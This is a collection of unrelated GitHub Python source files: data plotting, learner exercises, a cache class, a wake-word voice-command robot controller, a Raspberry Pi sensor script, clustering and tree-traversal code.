data.iloc[argrelextrema(data.dim.values, np.greater_equal, order=3)[0]][\n \"dim\"\n]\ndata[\"tratype\"] = 0\n\n\n# 
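A toy illustration of the plateau-tolerant extremum search used above (scipy.signal.argrelextrema with np.less_equal / np.greater_equal and order=3); the data array is invented:

import numpy as np
from scipy.signal import argrelextrema

dim = np.array([3.0, 2.5, 2.0, 2.2, 2.8, 3.5, 3.1, 2.9, 2.6])
minima = argrelextrema(dim, np.less_equal, order=3)[0]
maxima = argrelextrema(dim, np.greater_equal, order=3)[0]
print(minima, maxima)   # indices of points <= / >= every neighbour within 3 steps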
%%\ndata.loc[data[\"sigma\"] == 1, \"min\"] = np.nan\ndata.loc[data[\"sigma\"] == 1, \"max\"] = np.nan\ndata.loc[data[\"sigma\"] == maxsigma, \"min\"] = np.nan\ndata.loc[data[\"sigma\"] == maxsigma, \"max\"] = np.nan\n\n# %% [markdown]\n# Here we are classifying all trajectories into different types\n\n# %%\nfor sn in startnodes:\n traj = data[data[\"start_node\"] == sn]\n maxima = traj[traj[\"max\"].notnull()]\n data.loc[data[\"start_node\"] == sn, \"tratype\"] = Trajectories.classify(maxima)\n\n# %%\nfig, ax1 = plt.subplots()\n\nfor walk_type, col in Trajectories.iter():\n data_plot = np.array(\n list(\n data[data[\"tratype\"] == walk_type]\n .groupby(\"start_node\")\n .apply(pd.DataFrame.to_numpy)\n )\n )\n if data_plot.shape[0] > 0:\n data_plot = data_plot[:, :, 1:3]\n line_segments = LineCollection(data_plot, alpha=0.2, color=col[\"color\"])\n ax1.add_collection(line_segments)\n\n mean_per_sigma = data[data[\"tratype\"] == walk_type].groupby(\"sigma\").mean()\n ax1.plot(mean_per_sigma.index, mean_per_sigma[\"dim\"], c=col[\"mean_color\"])\n\nplt.axhline(3, c=\"tab:gray\", ls=\"--\")\n\nplt.xlim(0, 110)\n\nplt.xlabel(\"$\\\\sigma$\")\nplt.ylabel(\"$d_{\\\\rm spec}$\")\n\n# %%\nfig.set_size_inches(5.52, 3.41)\nfig.savefig(outfile, bbox_inches=\"tight\")\n# %%\n","repo_name":"mpauly/networks","sub_path":"plots/brain_rat.py","file_name":"brain_rat.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14849117912","text":"# Aprimorando os dicionários\n\nimport pandas as pd\nimport titulos\n\ntitulos.titulo1('*', 50, ' CADASTRO JOGADOR DE FUTEBOL ')\n\njogadores = []\nwhile True:\n nome = input('Nome do jogador: ').strip().capitalize()\n num_partidas = int(input(f'Número de partidas que {nome} jogou: '))\n gols = []\n for i in range(num_partidas):\n gols.append(int(input(f' Quantos gols na {i+1}ª partida? ')))\n total = sum(gols)\n\n jogador = {\n 'Nome': nome,\n 'Número de partidas': num_partidas,\n 'Gols': gols,\n 'Total': total\n }\n\n jogadores.append(jogador)\n while True:\n resp = input('Deseja continuar cadastrando [S/N]? ').strip().upper()[0]\n if resp in 'SN':\n break\n print('ERRO! Responda apenas S ou N.')\n if resp in 'N':\n break\n\nprint('-=' * 15)\n\ncoluna = ['Nome', 'Gols', 'Total']\ndados = []\n# linha = []\nfor jogador in jogadores:\n # linha.append(jogador['Nome'])\n dados.append(jogador)\n\ntabela = pd.DataFrame(columns=coluna, data=dados)\nprint(tabela)\n\nprint('-=' * 15)\n\nprograma = False\nwhile not programa:\n # mostrar_jogador = 0\n programa = True\n while True:\n mostrar_jogador = int(input('Mostrar dados de qual jogador [insira o código dele] (para sair digite 999)? '))\n if mostrar_jogador in range(len(jogadores)):\n break\n elif mostrar_jogador == 999:\n programa = False\n # else:\n print('ERRO! 
Insira um código válido.')\n # if mostrar_jogador == 999:\n # programa = False\n for indice, jogador in enumerate(jogadores):\n if indice == mostrar_jogador:\n print(f'=> Levantamento do jogador {jogador[\"Nome\"]}:')\n if jogador['Gols']:\n i = 1\n for n_gol in jogador['Gols']:\n print(f'No {i}º jogo fez {n_gol} gols.')\n i += 1\n\ntitulos.titulo2('*', 50, ' PROGRAMA FINALIZADO ')\n","repo_name":"gabriela-gnsales/python","sub_path":"Mundo_3/desafio_95.py","file_name":"desafio_95.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"30232899642","text":"#!/usr/bin/env python3\n\"\"\"\nLIFO module\n\"\"\"\nfrom base_caching import BaseCaching\n\n\nclass MRUCache(BaseCaching):\n \"\"\"\n storing, retrieving data in cache. remove data from cache when\n memory is full\n \"\"\"\n def __init__(self):\n \"\"\"\n inherit data from BaseCaching parent class\n \"\"\"\n self.recently_used = []\n super().__init__()\n\n def put(self, key, item):\n \"\"\"\n store data in cache. manage memory with mru\n algorithm\n \"\"\"\n if key is None or item is None:\n return\n self.cache_data[key] = item\n if len(self.cache_data) > BaseCaching.MAX_ITEMS:\n recent_key = \"\"\n if len(self.recently_used) == 0:\n recent_key = list(self.cache_data.keys())[-2]\n else:\n recent_key = self.recently_used[-1]\n del self.cache_data[recent_key]\n print(f\"DISCARD: {recent_key}\")\n if len(self.recently_used) > 0:\n self.recently_used.pop()\n\n def get(self, key):\n \"\"\"\n retrieve data from cache\n \"\"\"\n if key is None or key not in self.cache_data:\n return None\n self.recently_used = []\n self.recently_used.append(key)\n return self.cache_data[key]\n","repo_name":"kaytee07/alx-backend","sub_path":"0x01-caching/4-mru_cache.py","file_name":"4-mru_cache.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"15095158762","text":"import argparse\nimport os\nimport struct\nimport wave\nfrom datetime import datetime\nfrom threading import Thread\n\nimport pvporcupine\nfrom pvrecorder import PvRecorder\nimport tensorflow as tf\nimport os\nimport requests\n#import matplotlib.pyplot as plt\nfrom tensorflow import keras \ncommands= ['stop','up', 'yes', 'no' ,'right' ,'down', 'go', 'left']\n\ndef get_label(file_path):\n parts = tf.strings.split(\n input=file_path,\n sep=os.path.sep)\n # Note: You'll use indexing here instead of tuple unpacking to enable this\n # to work in a TensorFlow graph.\n return ''\ndef get_spectrogram(waveform):\n # Zero-padding for an audio waveform with less than 16,000 samples.\n input_len = 16000\n waveform = waveform[:input_len]\n zero_padding = tf.zeros(\n [len(waveform)] - tf.shape(waveform),\n dtype=tf.float32)\n # Cast the waveform tensors' dtype to float32.\n waveform = tf.cast(waveform, dtype=tf.float32)\n # Concatenate the waveform with `zero_padding`, which ensures all audio\n # clips are of the same length.\n equal_length = tf.concat([waveform, zero_padding], 0)\n # Convert the waveform to a spectrogram via a STFT.\n spectrogram = tf.signal.stft(\n equal_length, frame_length=255, frame_step=128)\n # Obtain the magnitude of the STFT.\n spectrogram = tf.abs(spectrogram)\n # Add a `channels` dimension, so that the spectrogram can be used\n # as image-like input data with convolution layers (which expect\n # shape (`batch_size`, `height`, `width`, `channels`).\n spectrogram = spectrogram[..., 
tf.newaxis]\n return spectrogram\n\ndef decode_audio(audio_binary):\n # Decode WAV-encoded audio files to `float32` tensors, normalized\n # to the [-1.0, 1.0] range. Return `float32` audio and a sample rate.\n audio, _ = tf.audio.decode_wav(contents=audio_binary)\n # Since all the data is single channel (mono), drop the `channels`\n # axis from the array.\n return tf.squeeze(audio, axis=-1)\n\nAUTOTUNE = tf.data.AUTOTUNE\ndef get_spectrogram_and_label_id(audio, label):\n spectrogram = get_spectrogram(audio)\n label_id = tf.argmax(label == commands)\n return spectrogram, label_id\n\ndef get_waveform_and_label(file_path):\n label = get_label(file_path)\n audio_binary = tf.io.read_file(file_path)\n waveform = decode_audio(audio_binary)\n return waveform, label\n\ndef preprocess_dataset(files):\n files_ds = tf.data.Dataset.from_tensor_slices(files)\n output_ds = files_ds.map(\n map_func=get_waveform_and_label,\n num_parallel_calls=AUTOTUNE)\n output_ds = output_ds.map(\n map_func=get_spectrogram_and_label_id,\n num_parallel_calls=AUTOTUNE)\n return output_ds\n\nimport sounddevice as sd\nimport wavio as wv\nimport struct\nimport wave\nfs = 16000 # Sample rate\nseconds = 1 # Duration of recording\n\n\n\n\n \n\n\nclass PorcupineDemo(Thread):\n \"\"\"\n Microphone Demo for Porcupine wake word engine. It creates an input audio stream from a microphone, monitors it, and\n upon detecting the specified wake word(s) prints the detection time and wake word on console. It optionally saves\n the recorded audio into a file for further debugging.\n \"\"\"\n\n def __init__(\n self,\n access_key,\n library_path,\n model_path,\n keyword_paths,\n sensitivities,\n input_device_index=None,\n output_path=None):\n\n \"\"\"\n Constructor.\n :param library_path: Absolute path to Porcupine's dynamic library.\n :param model_path: Absolute path to the file containing model parameters.\n :param keyword_paths: Absolute paths to keyword model files.\n :param sensitivities: Sensitivities for detecting keywords. Each value should be a number within [0, 1]. A\n higher sensitivity results in fewer misses at the cost of increasing the false alarm rate. If not set 0.5 will\n be used.\n :param input_device_index: Optional argument. If provided, audio is recorded from this input device. Otherwise,\n the default audio input device is used.\n :param output_path: If provided recorded audio will be stored in this location at the end of the run.\n \"\"\"\n\n super(PorcupineDemo, self).__init__()\n\n self._access_key = access_key\n self._library_path = library_path\n self._model_path = model_path\n self._keyword_paths = keyword_paths\n self._sensitivities = sensitivities\n self._input_device_index = input_device_index\n\n self._output_path = output_path\n\n def run(self):\n \"\"\"\n Creates an input audio stream, instantiates an instance of Porcupine object, and monitors the audio stream for\n occurrences of the wake word(s). 
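A hedged check of the get_spectrogram helper above on a synthetic one-second 16 kHz tone. The expected shape assumes tf.signal.stft's default fft_length (the smallest power of two covering frame_length); note that for clips shorter than one second the zero-padding expression above evaluates to an empty pad, since it subtracts the waveform's shape from its own length rather than from input_len:

import numpy as np
import tensorflow as tf

t = np.linspace(0, 1, 16000, endpoint=False)
tone = tf.constant(np.sin(2 * np.pi * 440 * t), dtype=tf.float32)

spec = get_spectrogram(tone)
print(spec.shape)   # (124, 129, 1): 1 + (16000 - 255) // 128 frames, 256 // 2 + 1 bins, 1 channel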
It prints the time of detection for each occurrence and the wake word.\n \"\"\"\n\n keywords = list()\n for x in self._keyword_paths:\n keyword_phrase_part = os.path.basename(x).replace('.ppn', '').split('_')\n if len(keyword_phrase_part) > 6:\n keywords.append(' '.join(keyword_phrase_part[0:-6]))\n else:\n keywords.append(keyword_phrase_part[0])\n\n porcupine = None\n recorder = None\n wav_file = None\n try:\n porcupine = pvporcupine.create(\n access_key=self._access_key,\n library_path=self._library_path,\n model_path=self._model_path,\n keyword_paths=self._keyword_paths,\n sensitivities=self._sensitivities)\n\n recorder = PvRecorder(device_index=self._input_device_index, frame_length=porcupine.frame_length)\n recorder.start()\n\n if self._output_path is not None:\n wav_file = wave.open(self._output_path, \"w\")\n wav_file.setparams((1, 2, 16000, 512, \"NONE\", \"NONE\"))\n\n print(f'Using device: {recorder.selected_device}')\n\n print('Listening {')\n for keyword, sensitivity in zip(keywords, self._sensitivities):\n print(' %s (%.2f)' % (keyword, sensitivity))\n print('}')\n\n while True:\n pcm = recorder.read()\n\n if wav_file is not None:\n wav_file.writeframes(struct.pack(\"h\" * len(pcm), *pcm))\n\n result = porcupine.process(pcm)\n if result >= 0:\n import pygame\n pygame.init()\n pygame.mixer.music.load(\"1.mp3\")\n pygame.mixer.music.play(-1)\n pygame.mixer.music.stop()\n response = requests.get(\"http://192.168.145.131:5000/api/picovoice\")\n if response.text != \"sleep\":\n recorder.stop()\n print(\"start\")\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=1, dtype='int16')\n sd.wait() # Wait until recording is finished\n print(\"finish\")\n wv.write(\"output.wav\", myrecording, fs, sampwidth=2)\n sample_file1 = 'output.wav'\n import numpy as np\n sample_ds = preprocess_dataset([str(sample_file1)])\n reconstructed_model = keras.models.load_model(\"model-final.h5\")\n for spectrogram, label in sample_ds.batch(1):\n prediction = reconstructed_model(spectrogram)\n counter = 0\n max_arg = 0\n max_val = -9999\n for i in prediction[0]:\n co = 1\n if counter == 2:\n co = .6 \n if i*co > max_val:\n max_arg = counter\n max_val = i*co\n counter = counter + 1\n print(commands[max_arg])\n requests.get(\"http://192.168.145.131:5000/api/\" + commands[max_arg])\n recorder.start()\n\n\n\n except KeyboardInterrupt:\n print('Stopping ...')\n finally:\n if porcupine is not None:\n porcupine.delete()\n\n if recorder is not None:\n recorder.delete()\n\n if wav_file is not None:\n wav_file.close()\n\n @classmethod\n def show_audio_devices(cls):\n devices = PvRecorder.get_audio_devices()\n\n for i in range(len(devices)):\n print(f'index: {i}, device name: {devices[i]}')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--access_key',\n help='AccessKey obtained from Picovoice Console (https://picovoice.ai/console/)')\n\n parser.add_argument(\n '--keywords',\n nargs='+',\n help='List of default keywords for detection. Available keywords: %s' % ', '.join(sorted(pvporcupine.KEYWORDS)),\n choices=sorted(pvporcupine.KEYWORDS),\n metavar='')\n\n parser.add_argument(\n '--keyword_paths',\n nargs='+',\n help=\"Absolute paths to keyword model files. 
If not set it will be populated from `--keywords` argument\")\n\n parser.add_argument('--library_path', help='Absolute path to dynamic library.', default=pvporcupine.LIBRARY_PATH)\n\n parser.add_argument(\n '--model_path',\n help='Absolute path to the file containing model parameters.',\n default=pvporcupine.MODEL_PATH)\n\n parser.add_argument(\n '--sensitivities',\n nargs='+',\n help=\"Sensitivities for detecting keywords. Each value should be a number within [0, 1]. A higher \" +\n \"sensitivity results in fewer misses at the cost of increasing the false alarm rate. If not set 0.5 \" +\n \"will be used.\",\n type=float,\n default=None)\n\n parser.add_argument('--audio_device_index', help='Index of input audio device.', type=int, default=-1)\n\n parser.add_argument('--output_path', help='Absolute path to recorded audio for debugging.', default=None)\n\n parser.add_argument('--show_audio_devices', action='store_true')\n\n args = parser.parse_args()\n\n if args.show_audio_devices:\n PorcupineDemo.show_audio_devices()\n else:\n if args.access_key is None:\n raise ValueError(\"AccessKey (--access_key) is required\")\n if args.keyword_paths is None:\n if args.keywords is None:\n raise ValueError(\"Either `--keywords` or `--keyword_paths` must be set.\")\n\n keyword_paths = [pvporcupine.KEYWORD_PATHS[x] for x in args.keywords]\n else:\n keyword_paths = args.keyword_paths\n\n if args.sensitivities is None:\n args.sensitivities = [0.5] * len(keyword_paths)\n\n if len(keyword_paths) != len(args.sensitivities):\n raise ValueError('Number of keywords does not match the number of sensitivities.')\n\n PorcupineDemo(\n access_key=args.access_key,\n library_path=args.library_path,\n model_path=args.model_path,\n keyword_paths=keyword_paths,\n sensitivities=args.sensitivities,\n output_path=args.output_path,\n input_device_index=args.audio_device_index).run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MohammadJRanjbar/Social-robots-an-open-source-framework-for-personal-assistant-robots","sub_path":"Robot/voice_detection.py","file_name":"voice_detection.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"28251103933","text":"import time\nimport pika\nimport logging\nimport broker\n\nfrom car import Car\n\nINTERVAL_SEC = 1.0\n\n\ndef send_scheduler(car: Car):\n while True:\n try:\n with broker.get_channel() as channel:\n # sleep na sterydach -> https://stackoverflow.com/a/54161792/7598740\n cptr = 0\n time_start = time.time()\n time_init = time.time()\n while True:\n try:\n car.fill_timestamp(time.time_ns() // 1_000_000)\n finalMessage = car.to_bytes()\n channel.basic_publish(\n \"amq.direct\",\n \"car\",\n finalMessage,\n pika.BasicProperties(\n delivery_mode=pika.DeliveryMode.Persistent\n )\n )\n car.reset()\n logging.info(\"[Send Scheduler] Messsage sent to broker\")\n except Exception as e:\n logging.warning(f\"Failed creating final message: \" + str(e))\n cptr += 1\n time_start = time.time()\n time.sleep(((time_init + (INTERVAL_SEC * cptr)) - time_start ))\n except:\n logging.warning(\"Broker connection can't be established\")\n time.sleep(0)\n","repo_name":"LodzSolarTeam/LST_Can_Hub","sub_path":"send_scheduler.py","file_name":"send_scheduler.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29335176790","text":"# coding=utf-8\n# author huxh\n# time 2020/3/21 10:57 AM\n\n# 动态规划 
自顶向下 (top-down dynamic programming with memoization)\ndef cuttingRope(n):\n d = {}\n\n def back(n):\n if n == 2:\n return 1\n if n in d:\n return d[n]\n\n res = -1\n for i in range(1, n):\n res = max(res, max(i * (n - i), i * back(n - i)))\n d[n] = res\n return res\n return back(n)\n\n# 动态规划 自底向上 (bottom-up dynamic programming)\ndef cuttingRope2(n):\n dp = [0] * (n + 1)\n\n dp[2] = 1\n for i in range(3, n + 1):  # include n itself, otherwise dp[n] is never filled\n for j in range(i):\n dp[i] = max(dp[i], max((i - j) * j, j * dp[i - j]))\n return dp[-1]\n\n# 动态规划 优化 (space-optimized: keeps only the last three dp values)\ndef cuttingRope3(n):\n dp = [0, 1, 1]\n\n for i in range(3, n + 1):\n dp[i % 3] = max(max(dp[(i - 1) % 3], i - 1),\n 2 * max(dp[(i - 2) % 3], i - 2),\n 3 * max(dp[(i - 3) % 3], i - 3))\n return dp[n % 3]\n\n# 找规律 (closed form: cut into as many 3s as possible)\ndef cuttingRope4(n):\n if n <= 3:\n return n - 1\n a, b = n // 3, n % 3\n if b == 0:\n return pow(3, a)\n if b == 1:\n return pow(3, a - 1) * 4\n return pow(3, a) * 2\n","repo_name":"Huxhh/LeetCodePy","sub_path":"jianzhioffer/14_1CuttingRope.py","file_name":"14_1CuttingRope.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26081699716","text":"#!/usr/bin/env python\nimport io\nimport sys, os\nsys.path.append(os.getcwd())\n\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.mixture import GaussianMixture\nfrom itertools import chain, compress, zip_longest\nfrom matplotlib.patches import Ellipse\n\nimport algo_factory\n \n# GMM algo parameters (sklearn.mixture.GaussianMixture)\n# n_components=1, // The number of mixture components.\n# covariance_type='full' // The type of covariance parameters to use. Options are: {‘full’ (default), ‘tied’, ‘diag’, ‘spherical’}.\n# tol=0.001 // The convergence threshold. EM iterations will stop when the lower bound average gain is below this threshold.\n# reg_covar=1e-06 // Non-negative regularization added to the diagonal of covariance. Ensures that the covariance matrices are all positive.\n# max_iter=100 // The number of EM iterations to perform.\n# n_init=1 // The number of initializations to perform. The best results are kept.\n# init_params='kmeans' // The method used to initialize the weights, the means and the precisions. Must be one of:\n# 1) 'kmeans' : responsibilities are initialized using kmeans\n# 2) 'random' : responsibilities are initialized randomly.\n# weights_init=None // The user-provided initial weights, defaults to None. If it is None, weights are initialized using the init_params method.\n# means_init=None // The user-provided initial means, defaults to None. If it is None, means are initialized using the init_params method.\n# precisions_init=None // The user-provided initial precisions (inverse of the covariance matrices), defaults to None.\n# If it is None, precisions are initialized using the ‘init_params’ method. 
The shape depends on ‘covariance_type’:\n# (n_components,) if 'spherical',\n# (n_features, n_features) if 'tied',\n# (n_components, n_features) if 'diag',\n# (n_components, n_features, n_features) if 'full'\n# random_state=None // Controls the random seed given to the method chosen to initialize the parameters (see init_params).\n# In addition, it controls the generation of random samples from the fitted distribution (see the method sample).\n# Pass an int for reproducible output across multiple function calls.\n# warm_start=False // If ‘warm_start’ is True, the solution of the last fitting is used as initialization for the next call of fit().\n# This can speed up convergence when fit is called several times on similar problems.\n# In that case, ‘n_init’ is ignored and only a single initialization occurs upon the first call.\n# verbose=0 // Enable verbose output. If 1 then it prints the current initialization and each iteration step.\n# If greater than 1 then it prints also the log probability and the time needed for each step.\n# verbose_interval=10 // Number of iteration done before the next print.\n\nclass GMMAlgo:\n def __init__(self, n_components, covariance_type, tol, reg_covar, max_iter, n_init, init_params, weights_init, means_init,\n precisions_init, random_state, warm_start, verbose, verbose_interval):\n self.n_components = n_components\n self.covariance_type = covariance_type\n self.tol = tol\n self.reg_covar = reg_covar\n self.max_iter = max_iter\n self.n_init = n_init\n self.init_params = init_params\n self.weights_init = weights_init\n self.means_init = means_init\n self.precisions_init = precisions_init\n self.random_state = random_state\n self.warm_start = warm_start\n self.verbose = verbose\n self.verbose_interval = verbose_interval\n\n # implementation of the algorithm, the argument are mandatory even if not used\n def start(self, data, weigths, nclusters, axis, figure=None):\n model = GaussianMixture(n_components=nclusters)\n\n # fit GM object to data\n model.fit(data)\n cluster_center = model.means_\n\n # draw ellipses\n self.addEllipse(axis, model.means_, model.covariances_, model.weights_)\n\n print(\"###################################################\")\n print(\"# Results of Gaussian Mixture clustering analysis #\")\n print(\"###################################################\")\n for i in range(len(cluster_center)):\n print(\"Cluster\",i,\"with center (x,y)=(\",cluster_center[i][0],\",\",cluster_center[i][1],\")\")\n print(\"###################################################\")\n \n\n def addEllipse(self, axis, mean, cov, weight):\n w_factor = 0.2 / weight.max()\n for pos, covar, w in zip(mean, cov, weight):\n self.draw_ellipse(pos, covar, axis, color=\"red\", alpha=w * w_factor)\n\n def draw_ellipse(self, position, covariance, axis, **kwargs):\n # Convert covariance to principal axes\n if covariance.shape == (2, 2):\n U, s, Vt = np.linalg.svd(covariance)\n angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))\n width, height = 2 * np.sqrt(s)\n else:\n angle = 0\n width, height = 2 * np.sqrt(covariance)\n\n # Draw the Ellipse\n for nsig in range(1, 4):\n axis.add_patch(Ellipse(position, nsig * width, nsig * height,\n angle, **kwargs))\n\n \nclass GMMAlgoBuilder:\n def __init__(self):\n self._instance = None\n\n def __call__(self, n_components=1, covariance_type='full', tol=0.001, reg_covar=1e-06, max_iter=100, n_init=1, init_params='kmeans',\n weights_init=None, means_init=None, precisions_init=None, random_state=None, warm_start=False, verbose=0, 
verbose_interval=10, **_ignored):\n if not self._instance:\n self._instance = GMMAlgo(n_components, covariance_type, tol, reg_covar, max_iter, n_init, init_params, weights_init, means_init,\n precisions_init, random_state, warm_start, verbose, verbose_interval)\n return self._instance\n\n","repo_name":"FRIBDAQ/SpecTcl","sub_path":"main/PyQtGUI/gui/gmm_creator.py","file_name":"gmm_creator.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21148210120","text":"#This script asks for a directory and then adds a pre or suffix to each filename in that directory.\n\nimport os\n\n#https://stackoverflow.com/questions/9727673/list-directory-tree-structure-in-python\nfor root, dirs, files in os.walk('.'):\n\tlevel = root.replace('.', '').count(os.sep)\n\tindent = ' ' * 4 * (level)\n\tprint('{}{}/'.format(indent, os.path.basename(root)))\n\tsubindent = ' ' * 4 * (level + 1)\n\tfor f in files:\n\t\tprint('{}{}'.format(subindent, f))\n\nwhile True:\n\tprint('')\n\tprint('The target needs to be a directory and the input needs to be given relative to the directory which this script is in.')\n\tprint('The current directory is \"'+os.getcwd()+'\\\\\".')\n\ttarget='.\\\\'+input('Name target directory: ')\n\tprint('Target is: \"'+target+'\".')\n\t\n\tif os.path.isdir(target):\n\t\tbreak\n\telse:\n\t\tprint('Not a directory.')\n\nwhile True:\n\tprint('')\n\tPreOrSuf=input('Do you want a prefix or a suffix? Anwser \"pre\" or \"suf\":').lower()\n\t\n\tif (PreOrSuf=='pre' or PreOrSuf=='suf') and (input('Anwser is \"'+PreOrSuf+'\". Correct? (Y/N): ')=='Y'):\n\t\tbreak\n\nif PreOrSuf=='suf':\n\twhile True:\n\t\tprint('')\n\t\tKeepExt=input('Do you want to keep the file extention? (Y/N): ')\n\t\t\n\t\tif (KeepExt=='Y' or KeepExt=='N') and (input('Anwser is \"'+KeepExt+'\". Correct? (Y/N): ')=='Y'):\n\t\t\tbreak\n\nwhile True:\n\tprint('')\n\ttext=input('What should the '+PreOrSuf+'fix be?: ')\n\t\n\tif input('The '+PreOrSuf+'fix is \"'+text+'\". Correct? 
(Y/N): ')=='Y':\n\t\tbreak\n\nfor filename in os.listdir(target):\n\t#https://stackoverflow.com/questions/2759067/rename-multiple-files-in-a-directory-in-python\n\t#https://stackoverflow.com/questions/225735/batch-renaming-of-files-in-a-directory\n\tif PreOrSuf=='pre':\n\t\tos.rename(os.path.join(target, filename), os.path.join(target,text+filename))\n\telif PreOrSuf=='suf' and KeepExt=='Y':\n\t\tExt=os.path.splitext(os.path.join(target, filename))[1]#https://stackoverflow.com/questions/541390/extracting-extension-from-filename-in-python\n\t\tos.rename(os.path.join(target, filename), os.path.join(target,filename[:-len(Ext)]+text+Ext))\n\telif PreOrSuf=='suf' and KeepExt=='N':\n\t\tExt=os.path.splitext(os.path.join(target, filename))[1]\n\t\tos.rename(os.path.join(target, filename), os.path.join(target,filename[:-len(Ext)]+text))\n\nprint('Done.')\n","repo_name":"TimHeiszwolf/Heis_Python_Tools","sub_path":"PreSufFix.py","file_name":"PreSufFix.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13204588925","text":"#!/usr/bin/python3\nimport sys\n\nlines = sys.stdin.readlines()\n# print(lines)\n# print(len(lines))\n\n# curr_i = 0\n# curr_j = 0\n# temp_ans = 0\n\ncurr_i, curr_j = 0, 0\ntemp_ans = 0\nstep = 2\nflag = True\n\nfor k in range(0, len(lines), step):\n # print(lines[k])\n # print(lines[k+1])\n val1 = int(lines[k].strip().split()[3])\n val2 = int(lines[k+1].strip().split()[3])\n # print([val1, val2])\n\n item_list = lines[k+1].strip().split()\n i = (int)(item_list[0])\n j = (int)(item_list[1])\n pos = (int)(item_list[2])\n value = (int)(item_list[3])\n\n # print([i,j,pos,value])\n\n # i, j, pos, val = list(map(int,lines[k+1].strip().split()))\n\n if (i == curr_i and j == curr_j):\n temp_ans += val1*val2\n else:\n if (flag == True):\n print(temp_ans, end=\"\")\n flag = False\n else:\n print(\" \", end = \"\")\n print(temp_ans, end = \"\")\n # print(temp_ans, end = \" \")\n temp_ans = 0\n temp_ans = val1*val2\n if i != curr_i:\n flag = True\n c = 0\n print()\n curr_i, curr_j = i, j\nif (flag == True):\n print(temp_ans, end=\"\")\nelse:\n print(\" \", end = \"\")\n print(temp_ans, end=\"\")\n# print(temp_ans)\n","repo_name":"RajaSudipta/Distributed-Systems-S23CS3.401-DS-IIITH","sub_path":"Assignments/A2/q2/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"73115858295","text":"#!/usr/bin/python3\n\n''' Task 8.1D - Raspberry Pi I2C\n\n Student ID: 219011171\n Student Name: Peter Stacey\n'''\n\nfrom signal import signal, SIGTERM, SIGHUP, pause\nfrom time import sleep\nfrom threading import Thread\nfrom gpiozero import DistanceSensor\nfrom rpi_lcd import LCD\n\n\nrunning = True\nmessage = \"\"\n\nlcd = LCD()\nsensor = DistanceSensor(echo=20, trigger=21)\n\ndef safe_exit():\n exit(1)\n\ndef read_distance():\n global message\n while running:\n message = f'Distance: {sensor.value:1.2f} m'\n print(message)\n sleep(0.1)\n\ndef update_display():\n global message\n while running:\n lcd.text(message, 1)\n sleep(0.25)\n\ndef main():\n try:\n signal(SIGTERM, safe_exit)\n signal(SIGHUP, safe_exit)\n reader = Thread(target=read_distance, daemon=True)\n display = Thread(target=update_display, daemon=True)\n reader.start()\n display.start()\n pause()\n except KeyboardInterrupt:\n pass\n finally:\n global running\n running = False\n reader.join()\n display.join()\n 
lcd.clear()\n sensor.close()\n\nif __name__ == '__main__':\n main()\n ","repo_name":"pscompsci/SIT210_Embedded_Programming","sub_path":"Task_8_1D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"75072045175","text":"class Node:\r\n def __init__(self, data):\r\n self.left = None\r\n self.data = data # self.data = None because create an object at a time None arguments passed in constructor\r\n self.right = None\r\n\r\n def createTree(self, val):\r\n if self.data is None:\r\n self.data = val\r\n return\r\n\r\n elif self.data == val:\r\n return\r\n\r\n elif self.data > val:\r\n if self.left:\r\n self.left.createTree(val) # the address of self.left transfer to self !\r\n else:\r\n self.left = Node(val)\r\n\r\n elif self.data < val:\r\n if self.right:\r\n self.right.createTree(val) # the address of self.right transfer to self !\r\n else:\r\n self.right = Node(val)\r\n\r\n # Level-Order-Traversal (In use BFS(Breadth First Search))\r\n def levelOrder(self):\r\n self.level = 1 # declare a level of tree\r\n Queue = [] # here, it is Queue\r\n Queue.append(self) # Queue is stored first root node address at 0 index\r\n Queue.append(None) # Queue is stored is None at 1 index ---> [self,None]\r\n\r\n while Queue != []: # here, it is check your queue is empty or not\r\n key = Queue.pop(0) # here, it's remove element at index 0 and to store a key variable\r\n if key is not None: # here, it's key is not None because key is stored a root address\r\n print(f\"Level - {self.level} => {key.data}\")\r\n\r\n if key.left is not None:\r\n Queue.append(key.left)\r\n if key.right is not None:\r\n Queue.append(key.right)\r\n\r\n else:\r\n print() # here, it's used to newline\r\n self.level += 1\r\n if Queue == []: # here, it's Queue is none as --- []\r\n break\r\n else:\r\n Queue.append(None) # here, it's Queue is stored is None ---> [None]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Queue = []\r\n root = Node(None)\r\n while True:\r\n num = int(input(\"\\n Enter the node into Tree : \"))\r\n if num < 0:\r\n break\r\n else:\r\n root.createTree(num)\r\n root.levelOrder()\r\n\r\n''' Here, it is Called Breadth First Search (BFS) Algorithms in used Tree '''\r\n\r\n# ---------------- Written By : - Aditya Pratap Singh 